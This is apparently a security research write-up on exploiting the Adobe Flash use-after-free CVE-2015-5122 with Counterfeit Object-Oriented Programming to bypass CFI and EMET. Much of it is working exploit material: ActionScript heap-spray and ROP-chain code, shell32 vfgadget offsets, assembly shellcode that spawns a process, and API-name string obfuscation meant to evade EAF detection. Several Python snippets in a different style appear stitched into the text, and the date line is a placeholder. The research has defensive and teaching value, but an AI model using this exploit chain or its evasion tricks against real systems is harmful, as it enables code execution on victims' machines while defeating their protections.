DATE HERE
By Perception Point Research Team

Breaking CFI:
Exploiting CVE-2015-5122 using COOP

CVE-2015-5122 is a use-after-free vulnerability that was used by Hacking Team to exploit Adobe Flash Player (version 18.0.0.203 and below). In this post we focus on exploitation rather than on the vulnerability itself. The important point is that by leveraging the vulnerability we gain a full read/write primitive over the process memory.

An analysis of the bug itself can be found here

Metasploit’s Exploitation

We based our work on Metasploit’s exploit of CVE-2015-5122. You can find the ActionScript source code here.
To achieve a read/write primitive, the bug is used to overwrite the length member of a vector object. The vector object is wrapped with the ExploitByteArray class, whose write(addr, data) and read(addr) methods provide the full read/write primitive.

First, the code sprays a vector containing a stack-pivot stub:

private function spray_objects():void
{
    Logger.log("[*] Exploiter - spray_objects()")

    // mov eax, [esp+0x4]
    // xchg eax, esp
    // ret
    stub[0] = 0x0424448B
    stub[1] = 0x0000C394

    for (var i:uint = 0; i < spray.length; i++)
    {
...
    }
}

As you can see in Exploiter.as, the code uses the ExploitByteArray object (eba) to write the ROP-chain and shellcode to the memory:

// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload

// Put the fake stack in memory
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; address will become stack after stack pivot
eba.write(0, virtualprotect)

// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)

// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE

// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)

// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
 

Code execution is gained by defining a fake “magic” method in the Exploiter class, whose vtable entry is overwritten using the ExploitByteArray. The overwritten vtable entry points to a gadget controlled by the attacker, which is invoked when the “magic” method is called.
In the Metasploit implementation, the attacker first calls VirtualProtect to change the page protection of the sprayed stack-pivot stub to PAGE_EXECUTE, and then uses the magic method a second time to call the now-executable stub and start the ROP chain:

// VirtualProtect the stub with a *reliable* stack pivot
eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stub_address)
eba.write(magic + 0x20, 0x10)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);

// Call to our stack pivot and init the rop chain
eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stack_address + 0x18000)
Magic.call.apply(null, null);
eba.write(magic_object, magic_table);
eba.write(magic + 0x1c, magic_arg0)
eba.write(magic + 0x20, magic_arg1)
 

The Magic method’s vtable offset is 28 (0x1c).
First, the attacker writes VirtualProtect’s address at offset 0x1c of a fake vtable, then overwrites the object’s vptr to point to the fake vtable.

This implementation is enough to exploit the vulnerability and bypass ASLR and DEP, but it is far from undetectable by modern CFI implementations. For example, shadow-stack-based CFI implementations will easily detect the stack pivot and the ROP chain execution, because they will observe that the magic function returns to a different address than the one pushed on the stack by the original call instruction.
Additionally, EMET’s “caller mitigation” algorithm detects the second VirtualProtect invocation from the ROP chain, because it disassembles the instructions at the return address of “critical functions” and validates that they are preceded by a CALL instruction (and were not reached through a RET instruction).
Also, before the ROP stage, some fine-grained CFI solutions will detect the first VirtualProtect invocation because it is performed by an unfamiliar CALL instruction.
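The shadow-stack check described above can be illustrated with a toy model. This is only a sketch of the idea, not any specific product's implementation: the `ShadowStack` class, the `returns_cleanly` helper, and the addresses are hypothetical names and values chosen for illustration.

```python
class ShadowStackViolation(Exception):
    """Raised when a return target differs from the recorded call site."""


class ShadowStack:
    def __init__(self):
        self._returns = []

    def on_call(self, return_address):
        # A CALL pushes the address of the next instruction; keep a copy.
        self._returns.append(return_address)

    def on_ret(self, actual_target):
        # A RET must go back to the most recently recorded return address.
        expected = self._returns.pop()
        if actual_target != expected:
            raise ShadowStackViolation(
                f"expected {expected:#x}, got {actual_target:#x}")


def returns_cleanly(shadow, call_site_return, ret_target):
    """Model one call/return pair and report whether the check passes."""
    shadow.on_call(call_site_return)
    try:
        shadow.on_ret(ret_target)
        return True
    except ShadowStackViolation:
        return False


shadow = ShadowStack()
print(returns_cleanly(shadow, 0x401005, 0x401005))    # ordinary call: True
print(returns_cleanly(shadow, 0x401005, 0x7F6E0000))  # pivoted return: False
```

The second case mirrors what happens after a stack pivot: the function returns to an address taken from attacker-controlled memory rather than to the instruction after the original CALL, so the comparison fails.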

To summarize, in order to make this exploit undetectable by modern CFI implementations, we must conform to the following constraints:

  1.   We must not violate the stack pointer or change any return address on the stack.
  2.   We must use the Magic method to invoke only legitimate functions. This rules out ROP-style gadgets, because their addresses point to the middle of a function, which CFI solutions can detect.
  3.   We must not use the Magic method to call critical functions such as VirtualProtect, VirtualAlloc, etc.

In order to implement the exploit under these constraints we need to use COOP (Counterfeit Object-oriented Programming).

COOP

Counterfeit Object-Oriented Programming (COOP) is a new code-reuse technique for C++ applications. It relies on the assumption that CFI solutions do not consider C++ semantics: they don’t check that every virtual function is called from an appropriate virtual call site. By creating a counterfeit object whose vptr points to a fake vtable containing function pointers of our choosing, we can invoke any virtual function without triggering CFI, because CFI solutions don’t validate that the called virtual function has any connection to the caller object’s class.

First, we need to find virtual functions that perform the operations we plan to do. These functions are called “vfgadgets”.
Second, to combine them, we need to find a special vfgadget called the Main Loop Gadget (ML-G, or ML-ARG-G if it is passed arguments). This vfgadget contains a loop that iterates through a list of objects and calls a virtual function on each of them. Such a vfgadget is commonly found in large C++ applications. We fill the counterfeit ML-G object with a fake member list of objects, each holding a fake vtable that contains a different vfgadget. This lets us execute different parts of the application’s code without violating the constraints described above.
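The dispatch pattern of a main loop gadget can be pictured with a small model. The sketch below is purely conceptual: objects are plain dictionaries, a "vtable" is a Python list, and every name in it (`main_loop_gadget`, `make_object`, `bump_counter`, `write_log`) is hypothetical. It only shows that the loop calls whatever sits in the vtable slot, without checking how that function relates to the object's class.

```python
def write_log(obj, log):
    # Stand-in for one vfgadget: records the object's field.
    log.append(f"log:{obj['field']}")


def bump_counter(obj, log):
    # Stand-in for another vfgadget: modifies the object's field.
    obj["field"] += 1
    log.append(f"bump:{obj['field']}")


def main_loop_gadget(container, log, slot=0):
    # Stand-in for an ML-G: iterate over the member objects and make the
    # same virtual call (same vtable slot) on each one.
    for member in container["members"]:
        member["vtable"][slot](member, log)


def make_object(function, field):
    # Each object carries its own one-entry "vtable".
    return {"vtable": [function], "field": field}


def run_demo():
    log = []
    container = {"members": [make_object(bump_counter, 41),
                             make_object(write_log, 7)]}
    main_loop_gadget(container, log)
    return log


print(run_demo())  # ['bump:42', 'log:7']
```

The order of the member list determines the order in which the functions run, which is the role the fake member list plays in the description above.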

More information about COOP can be found in this paper.

There are several ways to implement this exploit using the COOP technique. For example, we can search our C++ application for vfgadgets that let us write a file to disk, and then for another vfgadget that lets us execute it through CreateProcess or LoadLibrary.
Another way is to obtain a memory page with both EXECUTE and WRITE permissions by finding a vfgadget that calls VirtualProtect or VirtualAlloc, and then write our shellcode to this page and execute it.

In our implementation we chose the second way, because we found a very simple vfgadget that creates a page with EXECUTE_READWRITE permissions. However, during the research we also found five vfgadgets in the Flash DLL that do the following:

  1.   Create 2 directories under any path we choose (necessary for the next vfgadget).
  2.   Write a file to a path under the name “digest.s”.
  3.   Call the MoveFileEx API with full control over the source and destination parameters. This renames the file “digest.s” to “atl.dll”, which is necessary for the final vfgadget.
  4.   Call the SetCurrentDirectory API with a controllable path parameter. We can use it to set the process’s current directory to the path containing our payload file.
  5.   Call LoadLibrary on “atl.dll”, which loads our payload DLL.

Combining all these vfgadgets is possible but very complicated, and, as mentioned before, we found one simple vfgadget that gives us a memory page with EXECUTE_READWRITE protection.
This vfgadget is ATL::CComControl::CreateControlWindow, a virtual function we found in shell32.dll (Windows 7 SP1 32-bit).

ATL::CComControl::CreateControlWindow

Active Template Library (ATL) is a C++ template library that simplifies programming COM objects on Windows. These templates appear in several Windows libraries, including shell32.dll.
One of the classes found in shell32.dll is CComControl, which provides methods for creating and managing ATL controls.
The important method for us is CreateControlWindow.

According to Microsoft’s documentation, this is what the method does:

By default, creates a window for the control by calling CWindowImpl::Create.

Syntax

virtual HWND CreateControlWindow(
    HWND hWndParent,
    RECT& rcPos
);

Parameters

hWndParent
[in] Handle to the parent or owner window. A valid window handle must be supplied. The control window is confined to the area of its parent window.

rcPos
[in] The initial size and position of the window to be created.

Remarks

Override this method if you want to do something other than create a single window, for example, to create two windows, one of which becomes a toolbar for your control.

This method initializes and creates a window. Like every window, it needs a WndProc function, a callback that processes all the messages sent to the window.
We found that this function installs a thunk as the window’s WndProc procedure. The thunk transforms the Windows C callback call into a virtual function call by overwriting the first WndProc stack argument (which is supposed to be the window’s HWND) with a C++ this pointer.

The thunk data and its disassembly:

Thunk data:
c7 44 24 04 [DWORD thisPointer] e9 [DWORD WndProc]

disas:
mov DWORD PTR [esp+0x4], thisPointer
jmp WndProc
 

More information about the ATLThunk can be found here
Note: This method is relevant to Windows 7 as mentioned here, and is supposed to be changed in a later ATL version.
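The thunk layout shown above can be unpacked with a few lines of Python. This is a sketch under stated assumptions: the `decode_thunk` helper, the sample bytes, and the addresses are hypothetical, and it assumes the DWORD after the E9 opcode is the usual x86 32-bit displacement relative to the end of the jmp instruction.

```python
import struct

THUNK_SIZE = 13  # 4-byte mov opcode + imm32 + 1-byte jmp opcode + rel32
MOV_ESP4_IMM32 = b"\xc7\x44\x24\x04"  # mov dword ptr [esp+4], imm32
JMP_REL32 = 0xE9


def decode_thunk(data, thunk_address):
    """Return (this_pointer, jump_target) for a 13-byte thunk."""
    mov_opcode, this_pointer, jmp_opcode, rel32 = struct.unpack_from(
        "<4sIBi", data)
    if mov_opcode != MOV_ESP4_IMM32 or jmp_opcode != JMP_REL32:
        raise ValueError("bytes do not match the expected thunk layout")
    # The displacement is relative to the address after the jmp instruction.
    target = (thunk_address + THUNK_SIZE + rel32) & 0xFFFFFFFF
    return this_pointer, target


# Made-up sample: this = 0x12345678, displacement = 0x1000.
sample = bytes.fromhex("c7442404" "78563412" "e9" "00100000")
this_pointer, target = decode_thunk(sample, 0x00500000)
print(hex(this_pointer), hex(target))  # 0x12345678 0x50100d
```

Reading the two fields this way makes it easy to see that the thunk carries exactly two pieces of data: the object pointer it substitutes for the window handle and the location of the real window procedure.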

What’s really interesting in our vfgadget implementation is that the thunk is written to a page that is allocated by VirtualAlloc with EXECUTE_READWRITE permissions. This VirtualAlloc call is performed by ATL::_stdcallthunk::Init as you can see in the following screenshot (0x40 is the flProtect parameter, meaning EXECUTE_READWRITE):

The only things that actually matter to us are:

To summarize, we will create our counterfeit CComControl object, call the ATL::CComControl::CreateControlWindow vfgadget, and then use our read/write primitive (ExploitByteArray) to read the address of the created thunk. This ultimately gives us an EXECUTE_READWRITE page in which to store our shellcode.
Well, almost. The Magic method we use to execute the vfgadget passes 3 arguments to the virtual function, but ATL::CComControl::CreateControlWindow takes only 2, which corrupts the stack and crashes the process. To avoid this, we use another vfgadget that takes 3 arguments and use it to call ATL::CComControl::CreateControlWindow.

ML-ARG-G vfgadget

To find such a vfgadget we searched shell32.dll’s functions with an IDA script with the following constraints:

  1. It’s a virtual function (it is cross-referenced from a vtable)
  2. It has one indirect call that involves registers
  3. It receives 3 arguments like our Magic method (detected by “retn X” opcode)
  4. It passes 2 arguments to the indirect called function (detected by subtracting the pops count from the pushes count)
  5. It’s smaller than 0x30 bytes – after all, we don’t want a long and complex vfgadget.
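The five constraints amount to a simple predicate over per-function metadata. The sketch below is not the IDA script used in the research; it models the filter over hypothetical, hand-written records. The `FunctionInfo` fields, the sample entries, and the assumption that each stack argument occupies 4 bytes (so "retn 0xC" means 3 arguments) are all illustrative.

```python
from dataclasses import dataclass

POINTER_SIZE = 4  # 32-bit target: each stack argument takes 4 bytes


@dataclass
class FunctionInfo:
    name: str
    in_vtable: bool               # constraint 1
    indirect_register_calls: int  # constraint 2
    retn_bytes: int               # operand of the final "retn X"
    pushes_before_call: int       # pushes preceding the indirect call
    pops_before_call: int         # pops preceding the indirect call
    size: int                     # function size in bytes


def stack_argument_count(info):
    # Constraint 3: the callee cleans its own arguments with "retn X".
    return info.retn_bytes // POINTER_SIZE


def is_candidate(info, wanted_args=3, forwarded_args=2, max_size=0x30):
    forwarded = info.pushes_before_call - info.pops_before_call  # constraint 4
    return (info.in_vtable
            and info.indirect_register_calls == 1
            and stack_argument_count(info) == wanted_args
            and forwarded == forwarded_args
            and info.size < max_size)                            # constraint 5


functions = [
    FunctionInfo("hypothetical_forwarder", True, 1, 12, 2, 0, 0x24),
    FunctionInfo("hypothetical_too_large", True, 1, 12, 2, 0, 0x80),
    FunctionInfo("hypothetical_two_args", True, 1, 8, 2, 0, 0x20),
]
print([f.name for f in functions if is_candidate(f)])
```

Only the first record passes: the second exceeds the size limit and the third cleans up 2 stack arguments instead of 3.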

We looked over the script’s results and chose the best candidate: CLibrariesFolderBase::v_AreAllLibraries.
This vfgadget is actually a main loop gadget (ML-ARG-G) that calls the same virtual function (offset 0x4c of the vtable) in every iteration and stops iterating only when that function returns a success code (0).

The shellcode

We created a simple shellcode that executes calc.exe and terminates the process. It takes the addresses of CreateProcessW and ExitProcess as parameters (it assumes they are written in memory right after the shellcode).

[BITS 32]

mov esp, ebp;
call $+5;
pop ebp;
sub ebp, 0x7;
xor ebx, ebx;
lea ecx, [ebp + process_info];
push ecx;
lea ecx, [ebp + startup_info];
push ecx;
push ebx;
push ebx;
push ebx;
push ebx;
push ebx;
push ebx;
lea ecx, [ebp + calc_wstr];
push ecx;
push ebx;
lea eax, [ebp + eof];
add eax, 2;
call [eax]; ; kernel32!CreateProcessW
lea eax, [ebp + eof];        
add eax, 6;
call [eax]; ; kernel32!ExitProcess
db 0xcc;

calc_wstr: db "c", 0, "a", 0, "l", 0, "c", 0, ".", 0, "e", 0, "x", 0, "e", 0, 0;
padding: db 0x0, 0x0 ,0x0;
startup_info: db 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00;
process_info: db 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00;
eof: db 0x00, 0x00;
 

To bypass EMET’s EAF protection, we extended Metasploit’s PE.as library with a simple method that parses the PE import table and returns the address of the imported procedure you want to use.

Combining it all together

To finish our exploit implementation, we combine all the steps in exploit.as.
First, we set up all the addresses relevant to our exploit, including the 2 vfgadgets and the ExitProcess and CreateProcessW pointers:

var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var shell32:uint = pe.module("sh4ell32.dll".replace("4", ""), flash)
var ml_arg_g:uint = shell32 +0x2db3d6
var createWindow_g:uint = shell32 + 0x353e36
var original_this:uint = 0

// get ExitProcess and CreateProcessW procedures from import table to bypass EMET EAF
var exitProcess:uint = pe.get_import_table_procedure("KERNEL32.dll", "E2xitProcess".replace("2", ""), flash)
var createProcess:uint = pe.get_import_table_procedure("KERNEL32.dll", "Creat2eProcessW".replace("2", ""), flash)
 

Now, let’s build our counterfeit objects: the Magic method pointer at [vtable+0x18] will point to our ML-ARG-G, and the slot used by the ML-ARG-G’s inner call, [vtable+0x4c], will point to the CreateControlWindow vfgadget:

// first, we save the current this pointer, to recover it later
original_this = eba.read(magic_object);

var magic_vtable:uint = magic_object+0x40;

// now, lets put a fake vptr at [magic_object]
eba.write(magic_object, magic_vtable);

// [vtable+0x18] will hold the first vfgadget that will be invoked
// it will be the ML-ARG-G we found in shell32.
eba.write(magic_vtable + 0x18, ml_arg_g);

// [vtable+0x4c] will hold the second vfgadget that will be invoked
// It will be the createWindow vfgadget we found in shell32
eba.write(magic_vtable+0x4C, createWindow_g)
 

Now, invoking the Magic method will perform our COOP flow:

eba.write(magic + 0x1c, 0x0)
eba.write(magic + 0x20, magic_object+0x100)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);
eba.write(magic_object, original_this);
 

Once our COOP flow has finished, we can read the pointer to the allocated EXECUTE_READWRITE page. It is stored at offset 0x5c from “this”:

// createWindow allocated a page with EXECUTE_READWRITE protection, and stored a pointer to it on magic_object+5C
var allocated_address:uint = eba.read(magic_object+0x5c)

// get page base address
allocated_address = allocated_address&0xFFFFF000
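
The masking step above rounds the thunk pointer down to the start of its 4 KB page. A minimal Python sketch of the same arithmetic follows; the `page_base` and `page_offset` helpers and the sample address are made up for illustration.

```python
PAGE_SIZE = 0x1000  # 4 KB pages, matching the 0xFFFFF000 mask


def page_base(address):
    # Clear the low 12 bits to get the start of the containing page.
    return address & ~(PAGE_SIZE - 1) & 0xFFFFFFFF


def page_offset(address):
    # The low 12 bits give the position inside the page.
    return address & (PAGE_SIZE - 1)


sample = 0x02A51F40  # made-up pointer value
print(hex(page_base(sample)), hex(page_offset(sample)))  # 0x2a51000 0xf40
```

For any 32-bit address, `page_base(address)` equals `address & 0xFFFFF000`, which is the expression used in the ActionScript code.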
 

Now we can simply write our compiled shellcode to allocated_address, put this address in the Magic method’s vtable slot, and call the Magic method again.
